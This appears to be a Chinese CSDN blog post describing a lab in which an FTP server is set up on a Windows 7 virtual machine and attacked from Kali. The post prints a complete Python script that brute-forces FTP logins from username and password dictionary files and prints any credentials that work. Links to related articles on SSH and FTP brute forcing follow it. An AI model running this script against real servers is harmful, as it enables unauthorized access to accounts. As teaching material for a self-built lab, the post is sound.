身份认证攻击

最新推荐文章于 2024-11-09 22:46:56 发布
最新推荐文章于 2024-11-09 22:46:56 发布
阅读量658 收藏 2
点赞数 1
文章标签: linux 安全 python pycharm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50696533/article/details/125112667
版权

搭建 FTP 服务器, 操作系统为 win7 , 使用简单 FTP 程序即可。 设置用户名密码。

在VMware中打开win7,在win7中下载一个简单的FTP程序,下载完成后打开进行搭建

打开另一台操作系统kali确保两台主机能够进行通信,此时可以去编写密码暴力破解的程序

import ftplib
import sys,time

#判断输入的参数个数是否正确
if len(sys.argv) != 4:
    print("参数错误:正确形式为:python FTP_03.py  ip地址  用户名字典路径   密码字典路径")
    sys.exit()

FTPServer = sys.argv[1]
userDic = sys.argv[2]
passwdDic = sys.argv[3]

# 定义一个登录FTP服务器的函数
def login(FTPServer,username,password):
    try:
        f = ftplib.FTP(FTPServer)
        f.connect(FTPServer,21,timeout=10)
        f.login(username,password)
        f.retrlines("LIST")
        f.quit()
        print(f"用户名是{username},密码是{password}")
    except ftplib.all_errors:
        pass

# 读取用户字典和密码字典,遍历每个字典的用户名和密码,
# 调用FTP函数,将遍历的内容传递给FTP函数,实现登录FRP服务器
with open(userDic) as userFile:
    for user in userFile.readlines():
        with open(passwdDic) as passwdFile:
            for passwd in passwdFile.readlines():
                userN =user.strip('\n')
                pwd = passwd.strip('\n')
                time.sleep(1)
                login(FTPServer,userN,pwd)

把编写好的登录FTP服务器密码暴力破解的脚本复制到kali中进行执行,此时为了节省时间,自己就创建了用户名字典和密码字典

 

胖_嘟_嘟
关注
Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译
weixin_68243135的博客
11-15 596
WEB攻防--JWT--JAVAWEB项目--SSTI模板注入
学习笔记-身份认证攻击漏洞,文件上传漏洞
阿达斯加的博客
05-20 895
身份认证攻击漏洞 身份认证机制: 基于会话的验证 使用基于会话的身份验证(或会话cookie身份验证或基于 cookie 的身份验证),用户的状态存储在服务器上。它不需要用户在每个请求中都提供用户名或密码。相反,在登录后,服务器会验证凭据。如果有效,它会生成一个会话,将其存储在会话存储中,然后将会话ID发送回浏览器。 HTTP基本认证(HTTP Basic Auth) HTTP 协议中内置的基本身份验证是最基本的身份验证形式。有了它,登录凭据会随 每个请求发送到请求标头中。这种认证在路由器、Tomcat、A
“人生苦短,我用Python“——身份认证攻击
weixin_42902126的博客
11-05 2783
目前最常见的身份认证模式采用的仍然是“用户名+密码”的方式,用户自行设定密码,在登录时如果输入正确的密码,计算机就会认为操作者是合法用户。 但是这种认证方式的缺陷也很明显,如何保证密码不被泄露以及不被破解和已经成为网络安全的最大问题之一。本章中将介绍基于Python实现的密码破解。密码破解是指利用各种手段获得网络、系统或资源密码的过程。网络上很多常见的应用都采用了密码认证模式,例如FTP、Telnet、SSH等,这些应用被广泛地应用在各种网络设备上,如果这些认证模式出现了问题,那就意味着网络中的大量设备将会
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 5666
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh admin@193.168.1.26,任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
Kali渗透测试:身份认证攻击
Liu_Bruce的博客
05-24 2635
Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH、Telnet、FTP等。这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问题,就意味着网络中的大量设备将会沦陷。 针对这些常见的网络服务认证,我们可以采用一种“暴力破解”的方法。就是把所有可能的密码都尝试一遍。一般有以下3种思路: 1.1.1 纯字典攻击 这种思路最简单,攻击者只需要利用攻击工具将用户名和字典中的密码组合起来,一个一个尝试即可。破解成功的概率与选用的字典有很大关系。
Python渗透测试之身份认证攻击
waqqy的博客
04-26 3531
目前最为常见的 身份验证模式 采用的仍然是“用户名+密码”的方式,用户自行设定密码,在登录时如果输入正确的密码,计算机就会认为操作者是合法用户。 但是这种认证方式的缺陷也很明显,如何保证密码不被泄露以及不被破解已经成为网络安全的最大问题之一。 本章中将介绍基于Python实现的密码破解。密码破解是指利用各种手段获得网络、系统或资源密码的过程。 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的模式,例如 FTP、Telnet、SSH等,这些应用被广泛地应用在各种网络设备上,如果这些认证模式.
信息安全技术 在kali中完成身份认证攻击
ADKDLBJ的博客
05-11 1300
一、什么是身份认证攻击身份认证攻击是指攻击者试图获取或利用合法用户的身份信息,以便获得对系统、网络或应用程序的访问权限。身份认证攻击通常包括以下几种类型:1. 密码猜测攻击攻击者通过尝试多个可能的密码来猜测用户的密码,以便获得对系统或应用程序的访问权限。2. 社会工程学攻击攻击者通过欺骗、诱骗或其他手段来获取用户的身份信息,例如通过钓鱼邮件、电话诈骗等方式。3. 中间人攻击攻击者通过在用户和服务器之间插入恶意软件或设备,来截获用户的身份信息,以便获得对系统或应用程序的访问权限。
基于电子商务的身份认证攻击研究
12-23
随着电子商务的普及,网上交易、政府服务以及客户服务等都离不开网络环境,这使得身份认证成为保护系统免受恶意攻击的第一道防线。然而,各种针对身份认证攻击手段层出不穷,给电子商务安全带来了严重威胁。 身份...
Python渗透测试编程技术--------身份认证攻击(一)
dyx0910的博客
04-27 1676
Python渗透测试编程技术--------身份认证攻击(一)
Basic身份认证攻击
weixin_46022050的博客
04-24 3682
原理:身份认证就是用来检验登录的对象是否为合法用户 一般利用这个模块攻击的一般思路就是爆破爆破 这里以Tomcat弱口令漏洞为例 打开tomcat之后是这样的,试着admin,admin登录 这里利用方法是利用bp抓包爆破 这里得到抓包数据 这里查看红线处竟然是base64加密了 ,这里解码得到admin:admin这种形式的结果 这里就要利用一种新的形式进行爆破,传统方式爆破不能满足需求,...
十三、Kali Linux 2 身份认证攻击
m0_55313512的博客
02-21 1389
Kali Linux 2 网络渗透测试
linux长时间运行任务中断报警trap
djl的专栏,blog.djl.cx好记
11-08 195
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
Linux下的systemd/service
zxz_Fine的博客
11-05 573
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 749
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 293
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux——Linux基础指令
辰多代码的博客
11-05 844
比 more 更强大的分页器,支持前后翻页和搜索。1:移动文件或目录(前提是目标文件或目录不存在)。:重命名文件或目录(前提是目标文件或目录存在)。::显示系统上当前登录的用户及其相关信息。:显示网络连接、路由表和网络接口统计信息。:统计文件的行数、字数和字节数。:显示当前工作目录的完整路径。:列出目录中的文件和子目录。:显示或设置系统日期和时间。:在目录层次结构中搜索文件。:显示系统中正在运行的进程。:配置或显示网络接口信息。:显示当前用户的用户名。:更新现有文件的时间戳。:查找可执行文件的位置。
Linux kernel 源码下载与源码在线阅读地址及其相关资源网站
代码背包客的博客
11-06 397
Linux内核源码的下载地址和在线阅读方式有多种,下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站,供大家参考学习!
Xshell,Shell的相关介绍与Linux中的权限问题
最新发布
2301_81265915的博客
11-09 424
首先,先介绍一下我们学习Linux的工具:XshellXShell 是一个流行的 Windows 平台上的 SSH、Telnet 和 Rlogin 客户端,主要用于远程连接 Linux/Unix 系统。它的运行原理大致如下:1:协议支持: XShell 支持多种远程协议(如 SSH、Telnet、Rlogin 等)。最常用的是 SSH 协议,它提供了安全的加密通信。SSH(Secure Shell)通过加密对客户端和服务器之间的通信进行保护,以防止数据在网络中被窃听和篡改。2:建立连接。
针对口令身份认证的字典攻击原理
04-01
口令身份认证是一种常见的身份验证方式,其原理是用户输入口令(密码),系统将其与预先存储的口令进行比对,如果匹配成功,则认证通过。字典攻击是一种常见的攻击方式,其原理是攻击者利用预先准备好的口令字典,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值